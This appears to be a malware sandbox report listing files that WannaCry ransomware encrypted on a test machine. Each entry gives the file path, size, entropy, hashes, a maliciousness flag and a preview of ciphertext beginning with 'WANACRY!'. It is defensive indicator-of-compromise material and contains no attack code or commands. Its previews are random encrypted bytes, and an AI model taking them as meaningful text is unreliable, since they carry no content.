SHA1:	385949672C02CF0ED750AD7477596E86A9AD5716
SHA-256:	6DBFDE99E1C4DC16A62DAF8777303CB0CF690FD2F998C02FBD892CCFAD235194
SHA-512:	19C71BCE8E67214EAF4254E9F5B625AC9F34E0E7ACE77E5DD1248191060EE52F5CE5092EB3E2F5BFBAA1071E649636B0E10CB7FC6AAF6A9FB3D2284E9DA14CF5
Malicious:	true
Reputation:	unknown
Preview:	WANACRY!....f........z...W.w$O..+..I...=cJ.m.1.!\.N...7...O...t".q"......U\W..r.R..Z.(+S:..I..h[.l..8q....}9]c.%d."..4V.I...5.=+s.T.!..%..>.......$....P:....eL..!..]X_.<.>'.w...."b.i~.e..U..o.....y@..Rg.A.W..e..g,h.)...D.......Fd+.p........1.............:w.....!.......h...........I...h..?_F..4G.....l!...'YN_.:...... .w....?K.h/..L.:.A..C....ad;.A.9.\C\.o.X..m....2.y=...S.....R.9}.\|...5E.L.1.I..4c...x=g.w-t...^w.x..l3U~..E..+..zZ..2..QHUt\|.P.HT....8.......cr.dd..Sz..e.^X.....9.V......4.1.MM.a.LaX).7[.Oq.>..@'....zu.......?'t9Z....F/..V1o<..r......e....j......^.s.Bn..~.......SP..T...Q......!.d.`......r..oL/........;..;\t^D....+..rW.~.A}.....I.d+=.nB....l....=.,..M...~ '4[jk.H%mkT..O.%r...g..L.!..xp.r..S.....O=.2DHd=.....]...G..w......}&.S.8.v..;.=;.Y.p.\|..F.}p.O.SV/"..."F...$W++z...=z.!:..V..:.o..v."./QD..^7.+..n.5...n?...<l...w.#..E.H................[s.!6X;.m.Q.T.\n..P...{#.O.......AW6=<xX\s..".....:..3nf...@."Nr.V?..."..S?..f..Dd.....~

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{4969e51d-173c-4e79-9b57-3f39ed7bcf3f}\settingsglobals.txt.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	62648
Entropy (8bit):	7.9972012661735254
Encrypted:	true
SSDEEP:	1536:kyhojO2JD+lSi819M2Qek+05+J7iQzEZpbeEGqhBB:k0ojO3S9rj048MEzbeE1hb
MD5:	6E497A992F989C6C6A935662CBCD918E
SHA1:	BD9B6866A6E9534A0F1CCC9EE33756AE323689B3
SHA-256:	39CAAA3F3777CD392A94BE0A7A24175E2CFF1A487420ADA0242C7B2DE52D7C9B
SHA-512:	B08D5E2FAC013646D06B0CF9A2645F4F912E21899E8AF0A896AF7BD507DBADF372A43521D29185C651C66F4CE25700E18AB25AE63F9F02F013A4B285D1B60E27
Malicious:	true
Reputation:	unknown
Preview:	WANACRY!.....k..XL..MQ.#~D.....!&...l..O.x....L...12.....!X..r.:.g...B.O.\|.'.7}+r...dlN...V..Y./...[.....!V..w&....@.>u..o.....D...,.%...d..q.;4.....o.)I...q.Q.p.B...%.?!........D...5/.....L......=.7.i<.....p.?T..B.'....2...p.@.(.E'..h....L1_.ay..R5.............n;O../...83......q!vE......,....B..x.^....L.p.f.'.J._C.h..m.?.w[.ta.%Y...l.d...U..r..o.0.....q#D%.b.'B.qo... o..lOVDI.>...~W..9.F5..>....t.Y..]....Y..#.!.0o..8...%J...fL^t.&Y.t...e...Y.1.".\|.......c.b-.Ie_...cE..dD.&..B.N..@L....7{.r~MG'.qSK.n.G.l[.v..5%xe....I5.%... .O=O............+......./.03.g.;.?..B....}..N0~..a...f#:.:If.Ai.'..xf.J..e.....2...Zs(N%...........+..7...".#O";.W.0 ...N.V...X..7.....2.E.).[.-.B%\..t.......g.hn=H...-....n..........M.......m.m.....V..........t~.ND..R6R...k.D.Ab..8q.v.X..........'.......Y.f.yh......C.A#......L.}...+..R nV.-.Hl..".{\|._..b.....V..U~.V."......\....**.0....n....5.s]t.&....-.......M..(.../...G....?.ro1l..[.@.....b....{

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Input_{4969e51d-173c-4e79-9b57-3f39ed7bcf3f}\settingssynonyms.txt.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	128936
Entropy (8bit):	7.9983937581588345
Encrypted:	true
SSDEEP:	3072:q1Kyg5UbodejZKRH6oOEQsS8/DnjHJP2w8gRq9wr9L3gM:qIygTcoRHstsSKvJPcgRq9aL3gM
MD5:	0F4CB6C7E1D0CDFF79735773C847FA0E
SHA1:	870B088F460905D171F48E8413FEDCC9A5F3831F
SHA-256:	6AAE65D48E35F2EA1F854F2DB685BAE822079D8A6B7A442BA1C95449E7AFB6DA
SHA-512:	DDA208599DD5FFBD956A134F81391C046681ED43EF63ECDAD1138D3F2ABBDFA78453FEE94E3D0C4A131E61CF39DC996ABC5CE4CC5A9D1163C88BDFEC86EE3944
Malicious:	true
Reputation:	unknown
Preview:	WANACRY!....eF.:N......9#.%.!...Z _.R..eUUp..<..u.Y.r..:....S..w2%K,.......K...Z.\|.3..T$..p.7.R).R.8`.....6.... U..d..}..q.....IC.)AD\.hov.`i".ev\|9#..%..m.i...2?L.6..g2A0.]\.%..R0q..i....x.\|......{v..t.....9...7........b.........$m..^....n.f{T4..<.%..'.l............7......sD.7..x8/...4......[...sC/[).....0..?bG....9."?.........-.s..j.... ^..~..Mo.UM......V.s..F........?x/c.:0..B..5.>.U.#X.\|~N........Q?t....\|.9....v..2. ..oU....S.AV.>.5...kO./>...1p....g.......G..f........\|+...n.....y...B...X8J=J.@..wp...`.b.......GN]Y&..L.f.=..{t...z....m{r.....c...3Q64.X.b-..{.u....eb-...I...4O..7.z..vE..NA...]u...Dq........v<B..:.N..G^..qwII..\|7I.t.P....,..y......4.,.`-...5...Ok..........G.?u<..\|.vf.s.S..B.G....^..lW...e..~fa.jL....z/.z...D.a...F0....6.V.J.#(...CbD........p{..P..j..C$%..6c.../.0S\....@...H..b..0T..qL6..Ec...X0 .+.Rk....K...*.3.TO.==...fW...}.p~.^.3n...!3=T.\|O\|..E..s..r......jM.....C%c.E..."...b..1.....!............i.C..G.9.HS.....kv

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{b5f948f2-ed43-4efa-a5e8-c66e8e4b2569}\0.0.filtertrie.intermediate.txt.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	221672
Entropy (8bit):	7.999149022415201
Encrypted:	true
SSDEEP:	6144:TjklNnT9XVdAIgKqCZ4LgAX/DsliCO9gaT1LAB:0TnTvdArRU4/AZGS
MD5:	7A630C21325D1BED5A3CCE9C316EB7E6
SHA1:	6030A9BB83DA9D5C0F6FEEA1F79420244E4A2F27
SHA-256:	ABE7060755CC4B390A2167065B69F4F056A7CB3A29935F50B894D3B2B9EFB59E
SHA-512:	36B148D687C0FED5E606C2B0830462B480BD084E726F9E12519F3B10133CA7B83E9E54145CD95C16B53F94BCB623A937E220BEC57F1D3235A18EE6DD0D535625
Malicious:	true
Reputation:	unknown
Preview:	WANACRY!..........5I6.H.\.........0vG,.r...!/#F...@7.D.)...B..&....'MQLw..?..l.{..F.....Y.Y.5n.p}.... xw..u......X.3Rh..ez...H.;j...Ri..R..!.l......+.b.C..........\3..[.g.%k...`.).x.Sf....;.c.N...V...@........b..z...}._[.........]}.)Y...l.->.....q>.z....t......`......8..c...G..2..;.)..z)1.v..'.>.bRA.0.\Y=...y2t<.r..<[.&.H[#O6F.<..J#.H.dV.f.x.o...s..._.....f.T.......h.lB.._....pt.....J..vPg.9w!P..}..4......l.A>........;.gU...E. ......?$..6.)_.1..&.zIW&;.V.{..8..;T=...T...J.C4.....,p`;.].h..r.h..;..wp.B<ebV.yT..NWF.O......I..h...R....2.....$...J..fg.:....Vi....Ph....po..A.?y-.J<...xg...L. .m86.{...v.C~..&.Y.O..2u...b.u....d..o...N<'.-.z.`TKdM.(Y..v......T...qI..DM..nv...]\|J....`. .r....Ky....5p..dsl=..g >../.(.c.E.7Vd..DM......fG...@.\|R..F.9.\..z4.D@...ZE.a.......".....e.#..F4.A..[....S.....:\|.d..-..E#.[.T.a...Dp..=...&..rT....U'..rY^.......oc.q.1...z.......}. A..i.....C,.9 ..XgQ9j...<&.).7.A.8..5R.w...hq..4....fS..@....T.01.%R.nB.v.j

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{b5f948f2-ed43-4efa-a5e8-c66e8e4b2569}\0.1.filtertrie.intermediate.txt.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	296
Entropy (8bit):	7.19312536719387
Encrypted:	false
SSDEEP:	6:bkEFdmyOe4nnZ7Ic9sctNVHHqbtBLbXKExrqQp84FjHeloVDF+gQHssQ/i3ktaWg:bkEF8P7h7N5q5BvXlxrqQp5jmufQtQsv
MD5:	0892AA12CBD022DC1F141D6C58A2C17B
SHA1:	646225B52396A7A36FC219C29BB6B87161AA74CB
SHA-256:	553371557551D40FCE574260332AFB50D33D8EE32E525AB352217E40A9F7B347
SHA-512:	DBC64CC671025C6204C0A27C914A6DF645EC6461334762268ACC4FDA899FE673DC5CE72A91B516706B7D809CE4DAACA74352C3E0ECCF2CB9C864604CD30BBD21
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!........X.....J..)*.....UYST.o..tD.1KmR.WQ...........F..)....y6......p.....A.EGP[.006....~....P.....,s..7F..~8R...m..Ks...#.....y...O.4.X.......Z.L.B\|.......<.d..L'D>rnJm....X5..).f.?....g.....&.W..8.;. ..iK:M....=\|........VcL.U..>......c^..n...............%.3..9..J.J.

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{b5f948f2-ed43-4efa-a5e8-c66e8e4b2569}\0.2.filtertrie.intermediate.txt.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	296
Entropy (8bit):	7.179254703897137
Encrypted:	false
SSDEEP:	6:bkEmobh5zfukztnnPLEbjjslV+GKS8HZbImhSx+l6lYvuFvQBhh+:bkEmoFlfRRTEbPu8HLXGJaD+
MD5:	AC5608CDD41E9B7FA55B941E3BD68117
SHA1:	DE0C8A843E393637C62A868E535B6D0F18590D86
SHA-256:	DB938ED7FDB60F1AE6D5792ED16ADCD1797952A7E50C49F3845DE4CADE6ABB0F
SHA-512:	A3495227E772A9601E70B58E10578634FA17AAF4EB40DFA956A3D3D760A77EBCE45B3372BA79D640A0FD5E57F299584C927AFB98EAE34F20BECE764A2F2B0AED
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!......EK...W...\..Y..vf.~..<....!.'.wD.u...`..b.a.,.%...L...x.+.Qt...F.......`....N.....bm........S...a..,.Z.(ZEn....:....<......*..@........h.....K..p."zU..\l7.....-...L...X....V..++c......I%..~f.n..P.E...[.....4..k....Ul.qM/6.w.......,..5$.....n.P+...............\|@...Mx/..$..

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{fd8f40a4-ac14-48d6-9ef0-afd19dd2a012}\0.0.filtertrie.intermediate.txt.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	214008
Entropy (8bit):	7.999102878094797
Encrypted:	true
SSDEEP:	3072:LPuKVVuWHmgO00F0XJM4gleB/ZSVumMLI3cHezdqY5041qZBAbK4FECC8PJuHD3z:dVuYjFXWSXrmV3qeZqY50uqWK4F+/Hrz
MD5:	08DD58E801048127F80B6A85823C3F1C
SHA1:	F2966CCE9478EB0B42324B501E2A611B8FA86F73
SHA-256:	FD8EDC7D985662AD5A720E9F69516E630A5D504DA7A2DAD9835CC314C3974DE0
SHA-512:	76799E86F65065ACC67CEA025E04362B2C2377A095A44FDAA16EDCC5F51E002C3126F795476E20E5DBBE5EC6D225164F1F1D767B1CDBF0E0166EF3862F26821C
Malicious:	true
Reputation:	unknown
Preview:	WANACRY!.....&....M.H.T~.`..5NF.}s_....`..I.N\n..v.j?..N....q.a@>{C./..4.TV.[...K.m=..B...u.z.?l..Q.1.<Ay.B0..M.....wokoV...B._..Y....!...2L..{kUw..Yk&$...}.;....A.J.&..B[WR\|...y...X./..2..:.`...C...L.R.Ad.(xw.e.<A`.)V...g..E..).N..Q.k.wDM.........sb.."!.>.....B......M.{....)..w..\.~.j..r:.t.3.m5.O.P..u.e....;.o..l.-.......i...H....u...35..@..D...%........t.f..m...G..(..C\Q.s?.z.:.f"_:.@...#.S.n.3...4.:...`".N...-.P....qd:.....)..f..:..#V.....f...8-.T\5.......Y;fF...p..g.).X\|#.K.P.3.....A.{.:jL..T...Lq.1v......8.....-.t....B/..%.i..FIL...U.....CV6.LU..."p.Yw4$4q./.8.`.z.w.9.nq.1\|`.p..}..]~... J..4....`.&.(6.rM~....<.......VOF.....c ..;6.X.j ...1.xM..BM..h.}.O..:.Z...wW.&.GU...A..#.....=[.Ll.Y....*.ii^..${.j.).I{.mG..PUp..Uvf....q...a...Fj.5.L.PC/Kb.f~..V..Q.\D.0].C.....q..).i&.H[.....F..R..........i.G..a..v..i`.!...+..z.)T.mo...9!...f...3#..q%....2.......da.......?.O{W...$...-'...H....t$.(...(.].@...{pNI.....\}D_:mW<.g..cV..V:.H......

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{fd8f40a4-ac14-48d6-9ef0-afd19dd2a012}\0.1.filtertrie.intermediate.txt.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	296
Entropy (8bit):	7.2791988474044045
Encrypted:	false
SSDEEP:	6:bkErsmeP3jwTs2f1nNCiaaWCUvAPEEwG4rBZsgdtYotK0QuC:bkErsme7wzqiaaWCHP/4rRznQN
MD5:	A694D7A19BE51328EC9B6C024A7E77EB
SHA1:	C5A922EE01AD9E6329FA3692692E55897F7CBFBA
SHA-256:	52429E387B8642AF6AC46C0DAD1C6452668A1D002FE5A86BA2465246C2770A73
SHA-512:	6DBD1B0B28641710C1B76759286464AA6715F180CBE1C96BC1E228A876E6139265D0187BFBEB0D04535C5F9F19B975935737FF8C8CF80498C658160AD2538233
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!.......`.z.Z.;.+U.h.._.../e^...t...m.+...._......I..:...`dpM...o....{..fL....A..Iz.+/.`%.[\|.V..4.. t..(Q.7....6s..H..-..A..i..c..".ck..$..q.5^}.A.DK.@..?F...>..Y......3U.)H..\.^u..5i..y..'.i.v......B.6^.......J.^..Y....V...wWc.=.l...MN....Sd..k.rz..L..................T..Q..SYq.

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Settings_{fd8f40a4-ac14-48d6-9ef0-afd19dd2a012}\0.2.filtertrie.intermediate.txt.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	296
Entropy (8bit):	7.194292288283499
Encrypted:	false
SSDEEP:	6:bkEXxnXX+jSHBD8rLMPS4K/fLHKjBjwo0NoNE:bkEdX+jID/oT+2oVE
MD5:	BD12ADC2008E1055338D9E9167530D94
SHA1:	AB79677B10DFF21DB2FF5589DE04745067031FD5
SHA-256:	CFF8FDD797FCF309EF2194E562DCF0351E63F46DDC09BB56ABEE17FF61A56FAA
SHA-512:	AABD822E0E321E9B21516CEB009599A5982AAB05E407CC9E059A278781504B2676D8B830644E4B605966E8EFD2474EF4861E103BFEEF7AD6E08749CCB86A1B83
Malicious:	false
Reputation:	unknown
Preview:	WANACRY!.....YT....},..(....mX(...-...h..L.)B./...IO....H-.^..I}W7O\......\.. .XC..E.V..<.z...V.,..bg...m....4.=....~...8.L..1{.x2?.......AQL..iL...4.2Z?Rm..TIz.F.E....a...Rj.?...:.c..N{.).k.w2....c.8/..YC..0$.{....9...q....:W4i,........c.........).3c.............*U.....d.S.G...

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133366672597747525.txt.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	113208
Entropy (8bit):	7.99822487779402
Encrypted:	true
SSDEEP:	3072:72K2F+hbraz0ZzHG1JIXE3BMMj0/qB5T4wkB/:72K2Ehf3wwcMMuqB5kwE/
MD5:	E2B934590363B62DBF8878EC90988AF6
SHA1:	EB1E00A2CF99791DD4106CD4E57A90DFDAD20E50
SHA-256:	9148E8FED89A661197CDBAD803F8532A92E56E90D3E1F527961ED257FDBF41E6
SHA-512:	C48ED35BC0A3B0669A5AE831B4E76A302F8DE2B6153D47415586EDD53A9CD3D356E89888130640D4052FC26532F4C583FEF35A9130ECA75CC2F6B454A168A5C6
Malicious:	true
Reputation:	unknown
Preview:	WANACRY!....G..........xW....w.I.......w......%.....2+..By.X.rx..d.0...).d....P}..we....$....\|...&a..9;~:.jz..T......]R........~z.;....;..K%....W.e...^.(.n".f.m.....Z.;k...,...H^.........1...o.q8f?..X..'}aP.....h.....&.= ..\|4....+k9.>...........-~...[I.............p.".....\..R.....3...o``.J...GI.3y....."M3.....A.._.]).Vz.j.....S..h~.M...i...L.s.........R.Gs...x..v.z.....p..C.z..w{P%X;o........i......@8..".].QB..E.JL1..u..^...1]k..1-.^.......P&..h.]T.s.;..T..a.....Y..8.:..l.....yO..W..J.g.6.`.......}..j..j5B..S.7.....<......3.;.H.E.#.#...q8@.wB.......W.q..X.1.,,.....Xw.%bF9.(>a.R.t.....7bt.<...:3N.Qk.'.ic.._...=...?..1`WW..:....6...Zy..S..1Oh~..L...^. ..v..UF.9....yEN....qv.Y:.[{.4.(..P;..7.......u..Y...9#..C...d.D2...y.I.KT.w..C....(GL4.._.x.K.....a`.>.e.....g_..x....j.j.f..&.6.9[..w.&..OI ..KMT...l..(..M5...wD.... .vn.....N;........H....E)7.N..N.L..0._<.9m. .Z.4pq>.cH>?[.P.d.i\?..t...2....=..F.....$.2.*..a...2...Hg.zf...[...\|....

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133366673054843582.txt.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	111944
Entropy (8bit):	7.998212896667005
Encrypted:	true
SSDEEP:	1536:Neil9AxnwmZH3u9/3Cfhf1zyKnxqyNpcKVAyQMYV9ysFImz1ubwDPbKp1tC31:PcnwmZHe9vCfl1umnNpzBQr4k51T4Y1
MD5:	CF66BA9DDD041CA7FF801E1F7590349B
SHA1:	C36822F67F80B824F91C74F38EDC76B7A9947BEC
SHA-256:	A9F400C262967D3E007E8016340192A77E974856B358BE347DF3CCCD6F834247
SHA-512:	B43309BFF26C653FE568115BB72F4C0C3F6453F4974785A5E86C46928144718626F909DBAB1D10F63D7D1399808811BF8EB17FF406AB5D169F2A5A949E47B671
Malicious:	true
Reputation:	unknown
Preview:	WANACRY!...... ..u..{....at.`...r.JO.....bfR._.!...i........Y......$E.W..M.%.....86.o.....~.B.....!.........^S.=9/P...."...G......{t..-g9]UF..7c.>4._...55b...<.....k$.....^$...,E.\|h.H......bJ..F..7.}.9@...T.....<.C..(.h.Z.N.'.;.u.U..........h....n.E......#.......<.E>...%.......$&.\.w.d.!....Z.{.......T .]Z..Vp.G...C.....4uS;.j..........5. .=G..S....%...;6.....n3.....,..\.Y.......<...bK..j..q_.k.2...^2;.Z.......fA.w..j.....Z......PT/j.qP.]i%....+,4.Q]...n...5<8...u.o.A.id.\|....gx.....?..;..-.3....?w+.\.1=..,..z.\|.....&O q.In...r...`.k.U5<..#]l....lR.3........!.6..y.ol....&k......}..Q.&......K6.H.X.]=...D:s.G,.....St..2.....C.L/......J....(.#..Bu)....&..t...v.a}!.y....!h....E........Q\..eQ@.m...0`A"......A..8R..'......hw..6<...wC.".."TY.-.b4.G...Jd...6s=b%..i...bk.}.9AKD..6_.o..... ..s.DC.....\|Pr...8......=..R...q}z.z26.D.` .....]w.....Z0"Cv...K...a..~.....LwL......b3..q.U%a.1..3l.g.)...aM..H...Vr.6..g..[.G....a.H..t.....#..K.B....a.?..

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133366673354927603.txt.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	111944
Entropy (8bit):	7.998460799127424
Encrypted:	true
SSDEEP:	3072:xxG+2w+SWXheu9SpVIedAoAeyi1ZYCL7JOobG9V2A:C+J+SWXUu0VIedMeyi1ZYC3JOobG/X
MD5:	7710960C37227EC5586FE9FA7FDF5EAC
SHA1:	FD703B4AC57B5670E7AEB339F25DC9710D201524
SHA-256:	494724C309DBA771866913C299D56C99C549794A1DD79840817CC20EA28FC6A1
SHA-512:	2F0A4A2E524E0F755407DD707C533EF5C84A4676196FF75C23DB4CC328943E775BEEDD2594FC914AA4149593E669DF3682231A16A56444BAAB51DAB667AA8F30
Malicious:	true
Reputation:	unknown
Preview:	WANACRY!.....4.\....],(..M.9.Yw...bXS.M.A.Q".Bd>7.T.n..."`V..gm..+>.-+..?^..~..S..........=[....a.P....x....,s....VN.A.=w..K^.x.Ui]..Iys.F..j......R..eE'..Ru._..k..u..%d....f.hL...>.{\.w.z..t/.-.........6F...B.Y{g.jig..<o.....X.#\|kl.._.'..e....$r$:.;PX/(N.\...?......#........G..-..dz...yv. ...4%.:.p...M...\..73%.N..U......K.w..DHc;...R4..TTB.y...S.P$.......tu.-X.Dd.9..r\|<so.........w.[..5.J.iZ[........T.O.>..I...C./d.....F.v.Io..%.M....Nc..4.X..S.l.. S.EQ..-m.v.W....~....m}B..t&....Isr.M&0.3}..Z.....L!.b.3dT.U...".#..a....7...@Jm.S.Vl.p..j+...S..........4.P...>....i.'..G....E...\.j.J.\Vk7m@......0....`_.E.E.!..7...t../.V...p.UxY.9#...>~......../..s../.c.Q.......-)HB..z..s+.h...Z\..^..V....ti....HEap.....:e..[.$...$...{../(..........=.C..:.n...I.z.h.l.i8..L.L...V..k.Q....u.O.".ELI....r....D.gF..T.~."%q..X.......okg.>..c.]..`.2.).....m..".4.L...E....!p..0./.t.x.G.. .N%+...*.P..<F....M.$..]T..h.VcpWcnU..).S........l&<B......i....1X..Ad.O&I...}.

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133366673654956717.txt.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	111944
Entropy (8bit):	7.99837712860093
Encrypted:	true
SSDEEP:	1536:5JLg5lb838JukafE0CV/lIKeFcCGcdQTqi5F/hf+0FHTVc1sdbywxWiAtpoB9Yxl:AdJukCyqsTqcHtHmsdvxnB+lJkVQs5o
MD5:	D5B09F3558298B0C808091F5AB48FDAD
SHA1:	E5742597A31BD898E4552BE829BA4C9E7756AE85
SHA-256:	6E29C2F8F13EFE33F7E481B38CBC525DC40C3EE2AA4D87FE99631D4EBA6AA86C
SHA-512:	61AE686C60F1D45DD7E4AB65E234B27D188A3779A2F6CF54D66DADE9EE0C636D020B54A41819CC2696307F802E6ED94DB3728DC55B9405E48AB566E751CE525C
Malicious:	true
Reputation:	unknown
Preview:	WANACRY!.....d..D@^=.e ...6.>\|..s............K.>F...XZ....lm...&..\|.....I....^.&.f.d.j.L.b........0.. ..s.@...%....>..f"C.u3...9.VL$.78....lt...5k\....b}X..X...F......7l4.U.Z.s...H..X.!7.....q......Ne.....6-Yp....x.vj%.e....B.iM\|9AL..].>.Oz....]q.&....#.......W_.O.f....k..t~.O..-\|\.(J.....z$^..j].@......KH.L..~..z.=NT}...`....R=....q..NZe4q....D...<.....DC..;.u...2;ob.#.d....>...ax>l?....kDh.7.C#.B1...evt.D...o.E.t..T.}..@...n....3..&..TC%0b...0..Xl.......Hi.B...n6..aM.d..9.n.W.<..K.;u.,.E(....v.aD9.....v.\|Fl..8.w...}MZLr........8..&..K.....N....@."..LV.z.L...5/g..C....\|W.....A...#......... B....8.M'.,.dco.\.>.u..z....../.G..aU%..@./..O.\|X..o..D.......p..1..n..El`.7)..V......../.SyACO.2...+.....<.....g...P?.M...\|....o....43.2...$.Uj.g.D..zH.&.g{........>..#..q..x....../}O8Q7.j7.6.*^..j....2..<.P..P...N.!...L........<........t.".s..M.D.].\..MN8.7.....!.X.%.Q...A.A.0`ik:%.B.e..b..}..7:A.D8S.v..5./\.vP..;Z...vx.r......hfk.w.....5.S...2

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133366673955008222.txt.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	111944
Entropy (8bit):	7.998250542188004
Encrypted:	true
SSDEEP:	3072:W1sM6ukNy4fCoxrzIhOYwqxe0HRQevC/qv:W1hrTyrzAwqxeDevC/e
MD5:	6A1B684203AC5585EDCB3DBFFB330E3F
SHA1:	5B8B35C3107EFD49FFDEFF5241214C6AB8E12CFD
SHA-256:	78305E8A376B0E3E4F03D0464E8B485D2A5F9D8EC6D54F5FE06316A5F63CB3CE
SHA-512:	9CEC3C22B37C1984DA2025832F5A46BF8536CDCAA0F51BDBADA6D3AEEF92780F95B5DB2F5DE324D5D1711D37F63E9D7F0C85D9D821D4D557D843D5EB7EA3BBEA
Malicious:	true
Reputation:	unknown
Preview:	WANACRY!......t.....@.e.>I.....U....i....M{.X.3T.n........9..jY.-@......v....ZK,L..98.{..vm...3=....../K...ex.....y.Zoh.n,..`.7...\|..@).]n...N....k...(9.),$.^-........A_.6.I.....E.., .....C..2...V.w....:......9.gE....MH.s...[..H.u.....".q{.F..S..r.t..#i.....#........<.U>QN.&<h9_.k.#]y.a..l./..Y.(..m.K.........z%.\|p.j....).#.,.U2UB6.0..e"I...?.F...zyK/QQ...`+...R.R.B..![.\|.&..wr........!..UL\|?O.........'.Z...R!.~P.x.l!.v.>1....S..A....U.....:lM.......$M,.x..@.Sb.T.....['XS ..E..AM..q&O..{.....,.(..c...s.Q.vU.......F.w@.].\1.e_.L..%.[..3(5..F..^]..........};.....&......."..~....5.....W....x.iCb?^.\|..w....z.........@.4\..dZ..;..SN..J.}..i\|vW..8...5`..4..........0C.!.?us...K..X.J.O.~'?.K.YiQ..4f....BY.J}..+..J..-.f.C9.i.9.]....?.c.7.u....../....6d.../.p..G..>....1e....?y..z.K.....C...H...e..T.L4..1%..o..Mz...?...7.,{.N..)`....b....C.&a$.w...c.{.s...~._.+..a.\|..g...6"...u.....s(....#P........'.fA..&..... t&.\a....X.....(.a....... 4+]~6..`.zQ...!

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133366674255160830.txt.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	111944
Entropy (8bit):	7.998216087858021
Encrypted:	true
SSDEEP:	3072:KEnqpA+dx3aFgbNDYpT6MMjdw5t72Jz+br3kcZlhreP9oQn:LqpnJaqZDC6VjdAaz+fkAeVoE
MD5:	98AE79C74302E7270C57084CBAB3C4E9
SHA1:	84CBAD9EDD1F83DD1D9049EE274D388CAB18CBA8
SHA-256:	BF1CA48B40E94EE3CDA660F18175C84F11F7A0361C873C460822AA2C523BA376
SHA-512:	4551EA79D9A4AD92728DCA5BAF7F5EAF7351CD7DEE3E0A11E5DD02B3F50A4BCEB90D5C32819EF6F2A3A962E31CBF0CFB7E1C55B41B141C71D4383E8ADD521BA9
Malicious:	true
Reputation:	unknown
Preview:	WANACRY!.....dL..j:.y>..y.IU...WG5\|.]...po.\|KcT..O.w.[...s......../){9.=...M...s.............K.....V...M.....7.^\.P.z.G..qm..{P.....U.AF.......Cm8C5.........m^WV.m..v.hb...;...C.{....M..J\...>.Y\|..<,!.vzOB...T........"..o..i.a.S41...Q:I)n>....J_#..z.r.....#.........cz.A.a.Yo6..z....c.......R.I.aJ.b..I.uS...5Vn[....q.)k..........5.e..E..K..O.-..B...O.?V.F.D.W...}...AM.3.j.x.-pi.N3.]$.\6....!.vv.X."/.{...#.<..2.d.\.o...>..)........h......N.E.TcT..>.R.P.@.Ka...G...v....dg5.g.vh....h.......o"{.v.D.........s.Y.....=.8....t@....>..W1.0....9>.gI.....k@.>q.<...Z....I..."....6.p$9...!rX`.....r...q&nvY.Q..5.6.6!....%-h....\|0.Q...3&..M[!.].{....ph.;._.4..-.N..R..sk/.}....#..C.u4.!..<..V).Kp...t....S2. ..........r.$......w..+3....t...d....v...M..!a...9...2Rg...9sjXe..........2O.........X.j.`.].#V.....u..r....(............O..w..o.2.~...}..E.Q.;.....z...}..........<.`..................0..4......5..~:.\.Z..c..T....G..V.J.q.'7e.".....U.q..*.:..sNR..9.+p

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\SettingsCache.txt.WNCRYT

Download File

Process:	C:\Users\user\Desktop\Wannacry.exe
File Type:	data
Category:	dropped
Size (bytes):	690472
Entropy (8bit):	7.999748708556809
Encrypted:	true
